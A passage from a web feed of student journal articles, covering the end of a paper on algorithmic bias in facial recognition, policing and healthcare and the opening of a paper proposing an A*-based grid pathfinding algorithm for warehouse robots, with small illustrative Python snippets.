<figure class="wp-block-image aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="774" height="478" src="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.56.17 PM.png" alt="" class="wp-image-4033" style="width:522px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.56.17 PM.png 774w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.56.17 PM-300x185.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.56.17 PM-768x474.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.56.17 PM-230x142.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.56.17 PM-350x216.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.56.17 PM-480x296.png 480w" sizes="(max-width: 774px) 100vw, 774px" /><figcaption class="wp-element-caption">Figure‬‭ 6:‬‭ A showcase of character traits perceived‬‭ as masculine vs feminine. Masculine words tend to be associated with dominance, while feminine words tend to be associated with emotional intelligence. </figcaption></figure>



<h2 class="wp-block-heading">4. Addressing Algorithmic Bias in Broader Decision-Making Systems </h2>



<p>Beyond job hiring, cases of algorithmic bias appear in various fields, including facial recognition technologies, predictive policing, and healthcare (see Figure 8). The following sections will explore how these biases manifest in these areas and examine their implications. </p>



<h4 class="wp-block-heading">4.1 Facial Recognition Technology </h4>



<p>Facial recognition technologies (FRT) are used to identify faces in static or moving images. The accuracy of an FRT depends upon the quality of the image it assesses and the makeup of the algorithm itself. FRTs are popular in authentication processes, police work, and medical diagnosis. However, many FRTs have been found to exhibit algorithmic bias, leading to disparities in accuracy based on race, gender, and other demographic factors. An FRT first captures the details of an image, identifying whether it contains a human face. A person’s face is broken down into key features, such as the distance between the eyes and the shape of the cheekbones. This information is translated into a faceprint, unique to each individual. The faceprint is compared to images in a database to find a possible match (see Figure 7). False positives and false negatives are possible: a false positive misreads an image as a match when it is not, whereas a false negative fails to match the face. Challenges such as the quality of available images, lighting, and facial expressions can affect the accuracy of FRTs.</p>



<figure class="wp-block-image aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="998" height="504" src="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.59.35 PM.png" alt="" class="wp-image-4034" style="width:494px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.59.35 PM.png 998w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.59.35 PM-300x152.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.59.35 PM-768x388.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.59.35 PM-230x116.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.59.35 PM-350x177.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.59.35 PM-480x242.png 480w" sizes="(max-width: 998px) 100vw, 998px" /><figcaption class="wp-element-caption">Figure 7:‬‭ The 3 components of the facial recognition software system. The image is captured, converted into a digital representation (faceprint), and given a match score. A match score is a numerical value that helps determine if the individual’s face corresponds with an existing entry in the system, completing the identity verification process (‬‭ Lomibao, 2020). </figcaption></figure>



<p>Studies show that FRTs are often most accurate for lighter-skinned males but misidentify women and individuals with darker skin tones at significantly higher rates. Amazon’s Rekognition system, for example, was more accurate for white and Black men than for white women (93% accuracy) and dark-skinned women (68.6%). The U.S. National Institute of Standards and Technology (NIST) likewise found higher rates of false positives for Asian and African American faces than for Caucasian faces when testing against the FBI’s database of 1.6 million domestic mugshots (Fountain, 2022). </p>



<p>Diversifying training datasets to include more racial and ethnic groups would help mitigate algorithmic bias and promote fairer outcomes. However, establishing and adhering to rigorous standards is also essential to improving the quality and accountability of this technology. </p>



<h4 class="wp-block-heading">4.2 Predictive Policing </h4>



<p>Predictive policing is a law enforcement technique that uses data and algorithms to predict where and when crimes will occur. The goal is to use this information to prevent crime, but it has emerged as a controversial approach to law enforcement. One of the early implementations, CompStat in New York City during the 1990s, employed visual tools like pin maps to display crime data by frequency and location (Fountain, 2022). However, while CompStat aimed to promote efficiency and accountability, it also contributed to problematic practices such as &#8220;stop and frisk,&#8221; the practice of stopping individuals for questioning, sometimes without reasonable suspicion. Stop and frisk disproportionately targeted racial minorities, and research has shown that such practices can cause lasting psychological harm. </p>



<p>The practice has raised significant concerns about algorithmic bias and its implications for marginalized communities. Algorithms trained on skewed historical data can produce biased predictions that lead to over-policing, with officers repeatedly deployed to the same neighborhoods. Some municipal governments have issued executive orders banning the use of predictive policing software. While such bans are effective in the short run, they are not a substitute for legislative action. At the root, a larger focus on addressing algorithmic bias is crucial to ensure that predictive policing does not aggravate existing inequalities in the criminal justice system. </p>



<h4 class="wp-block-heading">4.3 Healthcare Algorithms </h4>



<p>In the healthcare industry, algorithms have also been shown to produce racial bias. A recent study found bias in an algorithm that generated individual-level medical risk scores affecting 200 million people. The algorithm identifies patients for &#8220;high-risk care management&#8221; but relies on healthcare costs as a proxy for illness, assuming that patients with higher medical costs are sicker. However, Black patients, despite having higher levels of illness than White patients assigned the same risk score, tend to generate lower healthcare costs due to limited access to care and implicit biases in the care they receive. Black patients’ spending also skews toward emergency visits and dialysis rather than the more expensive inpatient surgeries and outpatient specialist care (Fountain, 2022). </p>



<p>This research emphasized that biases often arise from flawed labels reflecting structural inequalities. Addressing these biases through improved algorithm design and iterative testing can lead to fairer outcomes, opening pathways for more equitable healthcare solutions. </p>
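
<p>The mechanism behind this bias is easy to reproduce in miniature. The sketch below uses entirely made-up numbers to show how ranking patients by cost rather than by a direct illness measure can deprioritize a group that generates lower costs at the same level of sickness; it illustrates the proxy-label problem in general, not the algorithm from the study.</p>

<pre class="wp-block-code"><code># Hypothetical patients: equal illness burden across groups, but group B
# generates lower costs (e.g., due to limited access to care).
patients = [
    {"id": "A1", "group": "A", "illness": 8, "annual_cost": 12000},
    {"id": "A2", "group": "A", "illness": 5, "annual_cost": 7000},
    {"id": "B1", "group": "B", "illness": 8, "annual_cost": 6000},
    {"id": "B2", "group": "B", "illness": 5, "annual_cost": 3500},
]

def top_k(patients, key, k=2):
    """Select the k 'highest-risk' patients for care management."""
    return [p["id"] for p in sorted(patients, key=key, reverse=True)[:k]]

# Cost as a proxy for illness: group A fills both care-management slots.
print(top_k(patients, key=lambda p: p["annual_cost"]))  # ['A1', 'A2']

# A direct illness measure selects the sickest patient from each group.
print(top_k(patients, key=lambda p: p["illness"]))      # ['A1', 'B1']</code></pre>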



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="442" src="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-10.00.59 PM-1024x442.png" alt="" class="wp-image-4035" srcset="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-10.00.59 PM-1024x442.png 1024w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-10.00.59 PM-300x130.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-10.00.59 PM-768x332.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-10.00.59 PM-1000x432.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-10.00.59 PM-230x99.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-10.00.59 PM-350x151.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-10.00.59 PM-480x207.png 480w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-10.00.59 PM.png 1324w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 8:‬‭ Besides job hiring, algorithmic biases exist in various societal places. Facial recognition technologies can misidentify individuals, particularly women and people of color, due to biased training data, leading to wrongful accusations or surveillance. Predictive policing occurs because algorithms used to predict crime can reinforce existing biases by over-policing specific communities based on historical data. Healthcare algorithms also possess biases, resulting in unequal treatment, with certain groups receiving less accurate diagnoses or care recommendations. </figcaption></figure>



<h2 class="wp-block-heading">5. Conclusion </h2>



<p>Algorithmic bias poses significant challenges across various sectors of the economy, often disproportionately affecting marginalized communities. As hiring practices evolve, companies increasingly rely on AI to make recruitment more efficient, yet this shift has also introduced unintended barriers to diversity, equity, and inclusion (DEI). Organizations aiming to improve DEI culture must prioritize transparency, accountability, and ethical considerations in the design of their hiring algorithms. While technical solutions are essential, they are often not enough on their own, which underscores the need for strong legislation to tackle algorithmic bias. Passing effective legislation is a moral responsibility to ensure that technology benefits everyone. The future of mitigating algorithmic bias depends on global collaboration: by passing thoughtful laws, we can build a technology environment that creates a fairer society and supports communities in a world that relies ever more on automation. </p>



<h2 class="wp-block-heading">6. References </h2>



<p>Albaroudi, E., Mansouri, T., &amp; Alameer, A. (2024). A Comprehensive Review of AI Techniques for Addressing Algorithmic Bias in Job Hiring. AI, 5(1), Article 1. https://doi.org/10.3390/ai5010019.</p>



<p>Bîgu, D., &amp; Cernea, M.-V. (2019). Algorithmic Bias in Current Hiring Practices: An Ethical Examination.</p>



<p>Chiu, R. (n.d.). Can We Fix AI Hiring Bias? Policy Commons. Retrieved October 24, 2024, from https://policycommons.net/artifacts/1320212/can-we-fix-ai-hiring-bias/1923502/.</p>



<p>Dastin, J. (2022). Amazon Scraps Secret AI Recruiting Tool that Showed Bias against Women. In K. Martin (Ed.), Ethics of Data and Analytics (1st ed., pp. 296–299). Auerbach Publications.</p>



<p>Fountain, J. E. (2022). The moon, the ghetto and artificial intelligence: Reducing systemic racism in computational algorithms. Government Information Quarterly, 39(2), 101645. https://doi.org/10.1016/j.giq.2021.101645.</p>



<p>Frissen, R., Adebayo, K. J., &amp; Nanda, R. (2023). A machine learning approach to recognize bias and discrimination in job advertisements. AI &amp; SOCIETY, 38(2), 1025–1038. https://doi.org/10.1007/s00146-022-01574-0.</p>



<p>Lomibao, L. (2020, December 13). Factsheet: Facial Recognition Technology (FRT). Stop LAPD Spying Coalition. https://stoplapdspying.org/facial-recognition-factsheet/.</p>



<p>Mumuni, A., &amp; Mumuni, F. (2022). Data augmentation: A comprehensive survey of modern approaches. Array, 16, 100258. https://doi.org/10.1016/j.array.2022.100258.</p>



<p>Sadek, T., Stanley, K. D., Smith, G., Marcinek, K., Cormarie, P., &amp; Gunashekar, S. (2024). Artificial Intelligence Impacts on Privacy Law. RAND Corporation. https://www.rand.org/pubs/research_reports/RRA3243-2.html.</p>



<p>Sen, S. (2023, September 22). Applicant Tracking System: The Ultimate Guide to Smart Hiring. Asanify. https://asanify.com/blog/human-resources/applicant-tracking-system-the-ultimate-guide-to-smart-hiring/.</p>



<p>The Ultimate Guide to AI in Recruiting [2024]. Joveo. (2024, October 4). https://www.joveo.com/the-ultimate-guide-to-ai-in-recruiting/.</p>



<p>The Three Challenges of AI Regulation. (n.d.). Brookings. Retrieved October 19, 2024, from https://www.brookings.edu/articles/the-three-challenges-of-ai-regulation/.</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Sanaa Gada
</h5><p>Sanaa is a passionate high school senior looking to study computer science in college, with a focus on developing technology that bridges the gap for marginalized communities. She enjoys giving back to the community via projects that support the rising generation such as leading science experiments and teaching programming to underprivileged youth. In her free time, Sanaa enjoys baking, dancing, hiking, and babysitting.
</p></figure></div>
<p>The post <a href="https://exploratiojournal.com/fair-or-flawed-how-algorithmic-bias-is-redefining-recruitment-and-inclusion/">Fair or Flawed? How Algorithmic Bias is Redefining Recruitment and Inclusion</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Optimising Warehouse Navigation: A Novel Two-Dimensional Grid Model for Robot Path Planning in Warehouse Logistics</title>
		<link>https://exploratiojournal.com/optimising-warehouse-navigation-a-novel-two-dimensional-grid-model-for-robot-path-planning-in-warehouse-logistics/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=optimising-warehouse-navigation-a-novel-two-dimensional-grid-model-for-robot-path-planning-in-warehouse-logistics</link>
		
		<dc:creator><![CDATA[Paarth Sonkiya]]></dc:creator>
		<pubDate>Sun, 20 Oct 2024 22:26:22 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=3892</guid>

					<description><![CDATA[<p>Paarth Sonkiya</p>
<p>The post <a href="https://exploratiojournal.com/optimising-warehouse-navigation-a-novel-two-dimensional-grid-model-for-robot-path-planning-in-warehouse-logistics/">Optimising Warehouse Navigation: A Novel Two-Dimensional Grid Model for Robot Path Planning in Warehouse Logistics</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: </strong>Paarth Sonkiya<em><br></em></p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>In practical warehouse scenarios, route optimization is an important factor due to its large impact on the cost and time efficiency of a warehouse, which directly affects overall productivity. Many algorithms have been developed to address this issue; the most commonly used in the industry include the A* algorithm and Dijkstra’s algorithm. While most perform adequately in static warehouse environments, many fall short in dynamic warehouses, where they are unable to adapt efficiently to changing layouts and obstacles without compromising time and cost efficiency. This study proposes a lattice-based two-dimensional algorithm designed to navigate warehouses while avoiding obstacles efficiently. Employing this algorithm can result in substantial cost reductions, as it optimizes travel distances and resource allocation. Moreover, the algorithm significantly enhances time efficiency by reducing order fulfillment times. This research offers a practical solution to a persistent challenge in modern warehouse logistics, and the effectiveness of the proposed algorithm suggests its potential to revolutionize the industry’s approach to route optimization.</p>



<p>Keywords: Lattice Paths · Route Optimization · Warehouse · AGVs</p>



<h2 class="wp-block-heading">1 Introduction</h2>



<p>With the rise of the internet, there has been a rapid surge in the e-commerce sector. Online shopping in particular has grown exponentially due to factors like wider product selection, convenience, and better pricing. This growth has increased the demand for more efficient and productive warehouse operations to meet growing customer expectations for fast and reliable delivery. New entrepreneurs have entered the industry, making warehouse logistics a highly competitive sector, and warehouses face constant pressure to optimize processes and reduce costs to remain profitable. This rise in competitiveness has also brought new problems. One of the most critical factors affecting the overall productivity of a warehouse is the storage and retrieval of goods, and many traditional methods are slow, inefficient, and error-prone. Most modern warehouses now address these challenges by utilizing automated guided vehicles (AGVs) to streamline storage and retrieval operations. The integration of AGVs and warehouse robots has significantly enhanced transportation speed and precision; these automated systems can improve efficiency, reduce labor costs, and minimize picking errors.</p>



<p>Optimizing path planning for these automated robots can therefore greatly affect the operational efficiency of warehouses. However, navigating warehouse environments optimally remains a key challenge, as they introduce complexities that traditional pathfinding algorithms struggle to handle: obstacles (such as unpredictable inventory placement, forklifts, and personnel), computational efficiency, and time taken. Existing pathfinding algorithms often fall short in these dynamic environments. This paper proposes a novel two-dimensional grid model and an optimized algorithm specifically designed to address these challenges and enable efficient robot navigation in dynamic warehouses.</p>



<p>Researchers over the past decade have developed several methodologies to address this persistent problem. The most popular algorithms used today are Dijkstra’s algorithm and the A* algorithm. Dijkstra’s algorithm [1] works by transforming the warehouse layout into a graph: each aisle intersection becomes a node, and paths between them become edges with weights representing travel time or distance. The algorithm then iteratively explores these connections, prioritizing unvisited nodes with the lowest total travel distance from the starting point, and efficiently determines the shortest path for a robot or picker to reach any destination within the warehouse. The algorithm guarantees finding the optimal path but can be computationally expensive for large and complex warehouses, and it struggles to adapt to dynamic changes like moving obstacles [5]. The A* search algorithm builds upon Dijkstra’s algorithm by incorporating a heuristic function to prioritize exploration towards the goal. A heuristic function is an informed estimate of the cost (distance, time, etc.) to reach the goal from a particular point in the environment; these estimates help the algorithm prioritize exploring the more promising paths that are likely to lead to the goal faster. For example, in a two-dimensional grid representing a warehouse, a common heuristic function is the Manhattan distance between a cell and the goal location [4], which estimates the minimum number of horizontal and vertical steps required to reach the goal, ignoring obstacles. Heuristics play a crucial role in path selection by directing the search towards more efficient paths: algorithms like A* use the total cost (a combination of movement cost and heuristic estimate) to evaluate neighboring cells and prioritize those with a lower total cost. This strategy focuses the search on promising areas and avoids exploring irrelevant parts of the environment, and it is the approach the proposed algorithm builds upon. This leads to faster pathfinding, especially in complex environments. However, the traditional A* algorithm can still be computationally expensive for very large warehouses [3].</p>
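
<p>To make the heuristic concrete, the short sketch below (a generic illustration, not any particular system’s code) computes the Manhattan-distance estimate and the combined cost f = g + h that A*-style searches use to rank candidate cells.</p>

<pre class="wp-block-code"><code>def manhattan(cell, goal):
    """Heuristic h(n): estimated steps to the goal, ignoring obstacles."""
    (x1, y1), (x2, y2) = cell, goal
    return abs(x2 - x1) + abs(y2 - y1)

def total_cost(g_cost, cell, goal):
    """f(n) = g(n) + h(n): distance travelled so far plus the estimate."""
    return g_cost + manhattan(cell, goal)

# A cell reached after 5 moves, still 2 + 3 grid steps from the goal:
print(total_cost(5, (3, 2), (5, 5)))  # 5 + (2 + 3) = 10</code></pre>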



<p>There have been many other approaches to this problem as well. For instance, the research by Yang et al. [6] introduces the concept of the largest convex polygon (LCP) to illustrate the shortest path traversing all goods locations under ideal conditions. This involves selecting an initial node, establishing a Cartesian coordinate system, and then adding nodes based on their positions relative to the initial node. The method could potentially improve vehicular navigation given its demonstrated reduction in time complexity and path length, but it does not consider real-world complexities, which limits its applicability in practical scenarios. In their study, Roodbergen et al. [2] propose a branch-and-bound algorithm adapted from the Travelling Salesman Problem (TSP) to identify the shortest path within a parallel-aisle warehouse. This approach is specifically designed for warehouses with crossovers at both the ends and midpoints of aisles. The authors compare their algorithm’s performance to established routing heuristics like S-shape, aisle-by-aisle, largest gap, and a combined method. Additionally, they explore the impact of warehouse layout on efficiency, demonstrating that incorporating cross aisles can significantly reduce travel time during picking operations by offering more direct routes. However, the paper did not explore the impact of non-random storage assignment rules on heuristic performance, which could be crucial in real warehouse settings.</p>



<p>Most existing algorithms exhibit limitations in scalability and computational time as warehouse complexity increases. Similarly, path planning methods for warehouse robots often struggle with slow convergence and neglect downstream impacts. These challenges highlight the need for advanced AGV scheduling and path planning algorithms that can adapt to dynamic environments and scale efficiently. This research therefore focuses on employing lattice pathfinding algorithms to optimise route planning in warehouse logistics, with a specific emphasis on effective obstacle avoidance. The objectives include developing and optimising a specialised lattice pathfinding algorithm, evaluating its performance against traditional methods, and providing practical recommendations for real-world warehouse navigation challenges.</p>



<h2 class="wp-block-heading">2 Problem Description</h2>



<p>This research specifically focuses on block stocking warehouses, also known as pile-type warehouses. Figure 1 shows a simplified model of the warehouse. The red squares represent the area that is occupied by a single block and the blue square shows the area an AGV can go to for the retrieval of goods.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="714" height="660" src="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.12.47 PM.png" alt="" class="wp-image-3894" style="width:526px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.12.47 PM.png 714w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.12.47 PM-300x277.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.12.47 PM-230x213.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.12.47 PM-350x324.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.12.47 PM-480x444.png 480w" sizes="(max-width: 714px) 100vw, 714px" /><figcaption class="wp-element-caption">Figure 1: A Simple representation of a block stocking warehouse.</figcaption></figure>



<p>For simplicity, a translated version of this warehouse image is considered in this paper, as shown in Figure 2. The intersections of the grid lines (nodes) represent the blocks, and the lines represent the paths a robot can take. The advantage of a simplified lattice-path model is that it readily accommodates pathfinding algorithms, which can explore the grid, evaluate possible movements between connected cells, and ultimately identify the optimal path for the robot to navigate within the warehouse.</p>
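
<p>The paper does not specify the underlying data structure, but one plausible encoding of such a lattice (an assumption made here for illustration) is a list of lists in which 0 marks a traversable node and 1 marks a blocked one, with neighbours reached by unit moves in the four grid directions.</p>

<pre class="wp-block-code"><code># 0 = free node, 1 = obstacle; rows index y, columns index x (illustrative).
grid = [
    [0, 0, 0, 1, 0],
    [0, 1, 0, 1, 0],
    [0, 1, 0, 0, 0],
    [0, 0, 0, 1, 0],
]

def neighbours(cell, grid):
    """Valid 4-directional moves: inside the grid and not an obstacle."""
    x, y = cell
    for dx, dy in ((1, 0), (-1, 0), (0, 1), (0, -1)):
        nx, ny = x + dx, y + dy
        if 0 &lt;= ny &lt; len(grid) and 0 &lt;= nx &lt; len(grid[0]) and grid[ny][nx] == 0:
            yield (nx, ny)

print(list(neighbours((2, 2), grid)))  # [(3, 2), (2, 3), (2, 1)]</code></pre>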



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="698" height="668" src="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.14 PM.png" alt="" class="wp-image-3895" style="width:508px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.14 PM.png 698w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.14 PM-300x287.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.14 PM-230x220.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.14 PM-350x335.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.14 PM-480x459.png 480w" sizes="(max-width: 698px) 100vw, 698px" /><figcaption class="wp-element-caption">Figure 2: The equivalent simplified model. Figure 3 portrays a model of a real-life warehouse.</figcaption></figure>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="1022" height="974" src="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.42 PM.png" alt="" class="wp-image-3896" style="width:454px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.42 PM.png 1022w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.42 PM-300x286.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.42 PM-768x732.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.42 PM-1000x953.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.42 PM-230x219.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.42 PM-350x334.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.13.42 PM-480x457.png 480w" sizes="(max-width: 1022px) 100vw, 1022px" /><figcaption class="wp-element-caption">Figure 3: Model of a realistic block warehouse with Navigation information.</figcaption></figure>



<p>This model depicts a more expansive and complex environment, similar to a modern warehouse with hundreds of blocks and aisles. The figure visually depicts the path a robot needs to take for the retrieval of goods within the warehouse environment, showing the robot’s navigation process and the key elements involved.</p>



<p>The green dot indicates the starting point for the robot’s journey; this can be the robot’s charging station or a designated starting location within the warehouse. The blue dots represent the specific locations, or blocks, within the warehouse that the robot needs to visit to retrieve goods. These blocks could correspond to individual storage locations, picking stations, or designated areas where specific items are stored; the sequence in which the blue dots are visited therefore determines the efficiency of the overall retrieval process. The red dot signifies the final destination for the robot after completing its retrieval task. This point could be a designated drop-off location or the robot’s charging station, depending on the specific workflow.</p>



<p>Figure 4 translates this large-scale warehouse model into a corresponding simplified lattice path model. Like the earlier lattice model, this representation abstracts the physical layout into a two-dimensional grid, but with a larger grid size to accommodate the increased complexity of the real-world warehouse. Translating real-world warehouse layouts into simplified lattice path models is crucial for pathfinding algorithms, for both simplicity and effectiveness: the algorithms operate more effectively within the grid structure, allowing them to determine optimal paths for robots navigating the actual warehouse environment while reducing complexity. The figure also represents obstacles in the path, where the solid black squares denote obstacles through which robots cannot pass. This scenario emphasises the challenges faced by robots performing tasks like navigation and path planning within warehouses.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="974" height="886" src="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.14.12 PM.png" alt="" class="wp-image-3897" style="width:510px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.14.12 PM.png 974w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.14.12 PM-300x273.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.14.12 PM-768x699.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.14.12 PM-230x209.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.14.12 PM-350x318.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/10/Screenshot-2024-10-20-at-11.14.12 PM-480x437.png 480w" sizes="(max-width: 974px) 100vw, 974px" /><figcaption class="wp-element-caption">Figure 4: Simplified model of a realistic block warehouse with obstacles.</figcaption></figure>



<p>The previous models provide a foundational understanding of block warehouse layouts. However, real-world warehouses present a more complex environment filled with various obstacles that robots must navigate around, and these obstacles pose significant challenges for robot path planning algorithms. Obstacles can be static or dynamic. Static obstacles are permanent fixtures within the warehouse that robots cannot move through, such as support pillars or walls, inventory storage racks and shelves, and designated no-go zones due to maintenance, safety reasons, or operations that require human intervention. Dynamic obstacles are elements that can change within the warehouse environment, creating temporary blockages for robots. This research does not address actively moving obstacles, but rather obstacles that may change position between runs while remaining stationary during run-time. This research proposes a novel algorithm that addresses these challenges by modifying the heuristic function while taking effective obstacle avoidance into consideration.</p>



<h2 class="wp-block-heading">3 Algorithm Design</h2>



<p>This section describes our pathfinding algorithm designed for robots navigating a grid-based environment with obstacles. The algorithm modifies A* search, a well-known technique for finding optimal paths in graphs or grids, which balances exploration of the search space with an informed prioritisation of promising paths. Our specific implementation focuses on finding the shortest path for a robot visiting multiple designated points within the warehouse. The problem can be formulated within the framework of a graph, where the warehouse layout is represented as a directed graph G = (V, E, D), comprising vertices V, edges E, and distances D.</p>



<p>Consider a path P = P<sub>1</sub>, P<sub>2</sub>, &#8230;, P<sub>n</sub>, as shown in Figure 5, where each P<sub>i</sub> denotes a coordinate on the x-y plane of the two-dimensional grid.</p>



<p>Vertices in the graph correspond to distinct locations within the warehouse, such as aisles, racks, intersections, and loading docks. Formally, V = {v<sub>1</sub>, v<sub>2</sub>, &#8230;, v<sub>n</sub>}, where n denotes the total number of vertices in the warehouse layout. Edges represent permissible paths or connections between vertices, denoting feasible routes that can be traversed by the warehouse vehicles or personnel. For any pair of vertices v<sub>i</sub>, v<sub>j</sub> in V, if there exists a direct path from v<sub>i</sub> to v<sub>j</sub>, then an edge e<sub>ij</sub> is present in E. Mathematically, E ⊆ V × V. The variable d represents the Manhattan distance between two nodes P<sub>1</sub> = (x<sub>1</sub>, y<sub>1</sub>) and P<sub>2</sub> = (x<sub>2</sub>, y<sub>2</sub>), which is given by:</p>



<p class="has-text-align-center">d(P<sub>1</sub>,P<sub>2</sub>)=|x<sub>2</sub> −x<sub>1</sub>|+|y<sub>2</sub> −y<sub>1</sub>|</p>



<p>This denotes the length or cost associated with traversing an edge in the warehouse graph. For any edge e<sub>ij</sub> in E, the distance d<sub>ij</sub> signifies the distance or cost to travel from vertex v<sub>i</sub> to vertex v<sub>j</sub>. Formally, D = {d<sub>ij</sub>},</p>



